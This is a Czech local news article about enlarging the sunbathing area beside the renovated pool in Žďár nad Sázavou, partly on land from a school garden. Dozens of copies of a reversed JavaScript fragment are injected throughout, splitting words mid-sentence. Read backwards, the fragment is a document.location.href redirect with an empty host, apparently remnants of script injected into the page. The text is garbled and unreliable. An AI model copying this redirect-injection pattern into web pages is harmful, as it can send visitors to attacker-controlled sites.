Žďár nad Sázavou, zdar nad sazavou, aktuality, louka
Rainbow page separator

Opalovací louka u bazénu bude větší, než se plánovalo

Pondělí, 14. května 2012

opalovaci-louka-bazen-aquacentrum-zdar-nad-sazavou-kveten-2012Žďár nad Sázavou/ U právě rekonstruovaného a modernizovaného plaveckého bazénu ve Žďáře nad Sázavou bude větší plocha pro opalování, než se původně plánovalo. Podle dosavadních plánů měla mít takzvaná opalovací loučka přibližně pět set metrů čtverečních. „Ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to plocha byla samozřejmě nedostačující,“ vyjádřil se k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu druhý žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Ladislav Bárta. Pro děti, které budou mít venku k dispozici menší brouzdaliště, měly být [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž na trávníku vybudovány například i nějaké atrakce a průlezky. Kromě nich by tedy na ležení a relaxaci v okolí bazénu už moc místa nezbývalo.

Vedení města se nakonec povedlo vyjednat se Základní školou Švermova, že na relaxační plochu bude využita i část školní zahrady. Jednat se má o lokalitu od silničky vedoucí pod skleníkem. Pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory nad silnicí už opalovací louka nijak nepostihne. Tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to krokem se podařilo mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pro rekreaci rozšířit na zhruba 1400 metrů čtverečních. Na finálových 1800 metrů čtverečních se pak vedení města dostalo poté, co rada odsouhlasila rovněž posunutí současného chodníku blíže k budově Kulturního centra Batyskaf.

Školákům, kteří přijdou o kus „své“ zahrady, nabídli Žďárští náhradní plochu. Ta se nalézá mezi vchodem do základní školy a přilehlou mateřinkou. „Děti by se mohly na vytváření podoby [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru spolupodílet. Ideální by byl vznik nějakého arboreta, které by mohlo sloužit i ke vzdělávacím účeům,“ konsta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovala Dagmar Zvěřinová, žďárská starostka a sená[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka. O [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, jak bude přesně náhradní zahrada vypadat, se však bude ještě jednat. (zp)